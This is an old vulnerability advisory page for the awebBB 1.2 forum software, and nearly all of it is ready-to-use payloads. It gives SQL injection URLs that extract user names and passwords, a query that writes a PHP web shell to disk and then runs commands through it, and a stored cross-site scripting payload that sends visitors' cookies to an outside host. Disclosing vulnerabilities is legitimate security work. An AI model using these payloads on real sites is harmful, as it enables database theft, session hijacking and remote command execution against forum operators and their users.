Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12115
HistoryApr 10, 2006 - 12:00 a.m.

awebBB 1.2 Vuln

2006-04-1000:00:00
vulners.com
7
  1. SQL Injection

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,passwor
d,0,0,0%20from%20users/*

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER()
,0,0,0/*

If magic_quotes_gpc is off:

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,'<?%20passthru($_G
ET[cmd])%20?>',0,0,0,0,0%20from%20users%20INTO%20OUTFILE%20'/PATH/shell.php'
/*

AND

/shell.php?cmd=ls

  1. Cross Site Scripting

/ndis.php

Insufficient check fpost.

<div class="blue-box"><div class="breaker"><a
id="id"></a><b>Re:Re:Re:test</b> by <a
href="dpost.php?p=test">test</a></div><table cellpadding="0" cellspacing="0"
border="0" width="100%"><tr><td height="80" width="80" rowspan="2"><img
src="images/af.jpg" border="0" align="left" width="80" height="80"></td><td
valign="top"><div class="breaker"><script>document.write("<img
src='http://bug/xss.php?c=&quot;+ document.cookie
+"'style=visibility:hidden;'>");</script></div></td></tr><tr><td
valign="bottom"><div align="right"><i>Love Life</i><br>15:24:04 -
2006-04-08</div></td></tr></table><div class="breaker"></div><div
id="masterdiv12"><div class="menutitle"
onclick="SwitchPlanet('sub12')">&nbsp~ <a href="#12">Reply</a></div><span
class="submenu12" id="sub12">

http://www.securitylab.ru/forum/read.php?FID=16&amp;TID=23108


Email: [email protected]
ICQ: 294308